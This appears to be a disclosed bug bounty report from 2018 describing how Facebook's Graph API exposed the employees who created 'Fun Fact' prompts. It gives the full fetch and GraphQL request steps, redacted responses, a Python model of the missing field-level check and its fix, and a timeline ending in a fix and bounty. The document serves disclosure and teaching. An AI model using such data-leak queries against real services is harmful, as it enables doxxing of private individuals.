Dox Facebook Employees Behind “Did You Know”

Facebook provides various “Did You Know” (aka “Fun Facts”) questions, i.e. prompts, for users to answer.

The identities of the creators (Facebook employees) of such stock Fun Fact prompts are supposedly not accessible to non-employees. As of this report, however, they are.

Reproduction

Step 0: Fetch stock Fun Fact prompts for their IDs

HTTP POST
https://www.facebook.com/profile/fun_facts/single_prompt/fetch

For the purpose of this demo, we are going to fetch only three entries instead of all 300-ish of them:

HTTP POST
https://www.facebook.com/profile/fun_facts/single_prompt/fetch?fetch_amount=3

The response payload should look like this (note the for (;;); prefix, which Facebook prepends to defeat JSON hijacking; it has to be stripped before the body is parsed as JSON):

for (;;); {
  "__ar": 1,
  "payload": {
    "cursor": "1234567890123456",
    "prompts": [{
      "attribution": "Created by Facebook Fun Fact Prompts",
      "emoji": "💭",
      "id": 307298943011368,
      "isCrowdsourced": false,
      "socialProof": null,
      "title": "The annoying thing about opening a bag of chips is..."
    }, {
      "attribution": "Created by Facebook Fun Fact Prompts",
      "emoji": "🚘",
      "id": 1738516039492152,
      "isCrowdsourced": false,
      "socialProof": null,
      "title": "My dream car is…"
    }, {
      "attribution": "Created by Facebook Fun Fact Prompts",
      "emoji": "🐶",
      "id": 1954295404830420,
      "isCrowdsourced": false,
      "socialProof": null,
      "title": "My first pet's name was..."
    }]
  },
  "bootloadable": {},
  "ixData": {},
  "gkxData": {},
  "lid": "1"
}

Therefore, the IDs of the Fun Facts for this demo will be [307298943011368, 1738516039492152, 1954295404830420].

Based on each prompt's isCrowdsourced and attribution values, we can determine that these three Fun Fact prompts were created internally by Facebook employees.

Proof of Concept

Step 1: Querying the /graphql endpoint

In this request, we use the three stock Fun Fact prompt IDs obtained in Step 0.

HTTP GET
https://graph.facebook.com/v2.12/graphql?q=nodes(307298943011368,1738516039492152,1954295404830420){fun_fact_prompt_title,fun_fact_prompt_creator{id,name,url}}

The response looks like this (employee info redacted from the original report):

{
  "307298943011368": {
    "fun_fact_prompt_title": "The annoying thing about opening a bag of chips is...",
    "fun_fact_prompt_creator": {
      "id": "1",
      "name": "A Facebook Employee",
      "url": "https://www.facebook.com/..."
    }
  },
  "1738516039492152": {
    "fun_fact_prompt_title": "My dream car is…",
    "fun_fact_prompt_creator": {
      "id": "1",
      "name": "A Facebook Employee",
      "url": "https://www.facebook.com/..."
    }
  },
  "1954295404830420": {
    "fun_fact_prompt_title": "My first pet's name was...",
    "fun_fact_prompt_creator": {
      "id": "1",
      "name": "A Facebook Employee",
      "url": "https://www.facebook.com/..."
    }
  }
}

This response indicates that these stock Fun Fact prompts were created by (redacted), a “(redacted)” at Facebook. Non-employees should not have access to this information.
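As an added illustration (not the original report's or Facebook's code), here is a minimal Python model of the nodes(...){...} resolver showing the underlying defect and its mitigation: with field-level authorization switched off, any requested field is returned to any viewer, so fun_fact_prompt_creator leaks; with it switched on, the creator field is checked against the viewer before it resolves. The Viewer type, its is_employee flag, the visibility policy and the in-memory prompt store are assumptions; the sample data reuses the prompt IDs and redacted creator values quoted above.

```python
from dataclasses import dataclass
from typing import Iterable

@dataclass(frozen=True)
class Viewer:
    id: str
    is_employee: bool  # assumption: the request context carries an employee flag

# Constructed sample store, keyed by prompt IDs quoted in the report above.
CREATOR = {"id": "1", "name": "A Facebook Employee", "url": "https://www.facebook.com/..."}
PROMPTS = {
    307298943011368: {"title": "The annoying thing about opening a bag of chips is...", "creator": CREATOR},
    1954295404830420: {"title": "My first pet's name was...", "creator": CREATOR},
}
TITLE_FIELD = "fun_fact_prompt_title"
CREATOR_FIELD = "fun_fact_prompt_creator"

def creator_visible_to(viewer: Viewer, prompt: dict) -> bool:
    """Assumed field-level policy (not Facebook's): only employees and the
    creator themselves may read who authored a stock prompt."""
    return viewer.is_employee or viewer.id == prompt["creator"]["id"]

def resolve_nodes(viewer: Viewer, ids: Iterable[int], fields: Iterable[str],
                  enforce_field_auth: bool) -> dict:
    """Resolver for nodes(<ids>){<fields>}.
    False reproduces the reported behaviour: every requested field goes to any viewer.
    True is the mitigation: the creator field is authorized per viewer and
    resolves to null (None) when the check fails; the title stays public."""
    wanted = set(fields)
    result: dict = {}
    for pid in ids:
        prompt = PROMPTS.get(pid)
        if prompt is None:
            continue  # unknown node IDs are omitted from the response
        node: dict = {}
        if TITLE_FIELD in wanted:
            node[TITLE_FIELD] = prompt["title"]  # public: everyone sees the prompt text
        if CREATOR_FIELD in wanted:
            allowed = (not enforce_field_auth) or creator_visible_to(viewer, prompt)
            node[CREATOR_FIELD] = prompt["creator"] if allowed else None
        result[str(pid)] = node
    return result

if __name__ == "__main__":
    outsider = Viewer(id="999", is_employee=False)
    ids = [307298943011368, 1954295404830420]
    print(resolve_nodes(outsider, ids, [TITLE_FIELD, CREATOR_FIELD], enforce_field_auth=False))
    print(resolve_nodes(outsider, ids, [TITLE_FIELD, CREATOR_FIELD], enforce_field_auth=True))
```

The check belongs on the field resolver, not only on the top-level node lookup: the prompt node itself is legitimately public, and it is the creator sub-field that needs the viewer-based gate.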

Timeline

2018-02-14: Report Submitted

2018-02-16: Further Investigation by Facebook

2018-03-08: Fixed by Facebook

2018-03-13: Bounty Awarded by Facebook